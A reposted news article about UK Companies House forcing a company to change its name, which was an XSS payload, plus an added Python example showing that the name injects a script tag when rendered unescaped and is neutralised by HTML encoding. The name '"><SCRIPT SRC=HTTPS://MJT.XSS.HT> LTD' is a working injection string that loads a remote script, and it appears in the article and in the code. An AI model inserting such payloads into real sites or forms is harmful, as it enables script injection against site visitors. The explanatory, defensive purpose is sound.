admin
Pinned November 19, 2020

Company made to change name that could be used for website hacks

Jon Fingas, @jonfingas

November 8, 2020

Companies have jokingly given themselves code-based names in the past (you can thank XKCD for that), but one of them was just forced to mend its ways. The Guardian reports that UK business registrar Companies House has forced a software consultant to change his company name after discovering that it could launch cross-site scripting attacks against vulnerable pages — yes, including Companies House. A site could have inadvertently compromised itself just by mentioning the company, which could be more than a little embarrassing for officials who greenlit the name.

The initial name, “"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD,” risked confusing sites that put it on a page without escaping its HTML characters. The leading quote and angle bracket close the attribute and tag the name is being written into, so those sites would think the company name was blank and run a script from the troubleshooting site XSS Hunter. It’s an innocuous script that would simply have put up a warning, but Companies House wasn’t willing to take any chances. The name might have “presented a security risk” to some sites, a spokesperson said.
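
The behaviour described above, as an added example (not code from the article, Companies House or XSS Hunter): a hypothetical template writes the company name into an `<input>` value, and Python's standard HTML parser reports what a parser sees with and without output encoding. The template and all function names are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser

# The registered company name quoted in the article.
COMPANY_NAME = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD'

# Hypothetical page template: the name lands inside an attribute value.
TEMPLATE = '<input name="company" value="{name}">'


class TagAudit(HTMLParser):
    """Records the input values and script sources found in the markup."""

    def __init__(self):
        super().__init__()
        self.input_values = []
        self.script_srcs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input":
            self.input_values.append(attrs.get("value"))
        elif tag == "script":
            self.script_srcs.append(attrs.get("src"))


def render_unsafe(name):
    """Vulnerable: the raw name is interpolated straight into the HTML."""
    return TEMPLATE.format(name=name)


def render_safe(name):
    """Hardened: &, <, >, " and ' are encoded before reaching the markup."""
    return TEMPLATE.format(name=escape(name, quote=True))


def audit(markup):
    """Parse the markup and return (input values, script sources)."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.input_values, parser.script_srcs


if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        values, scripts = audit(render(COMPANY_NAME))
        print(f"{render.__name__}: input values={values} script srcs={scripts}")
```

With the raw name the parser sees an empty input value followed by a script element; with encoding it sees one input whose value is the full company name and no script element.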

The consultant has since changed his business name to “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD.” Companies House, meanwhile, said it had “put measures in place” to prevent a repeat. You won’t be trying this yourself, at least not in the UK.

It’s more than a little amusing to see a for-the-laughs code name stir up trouble, but this also illustrates just how fragile web security can be. If a clever name can wreak havoc, there’s a lot of work to be done before site owners can say they’ve nailed security.

Engadget
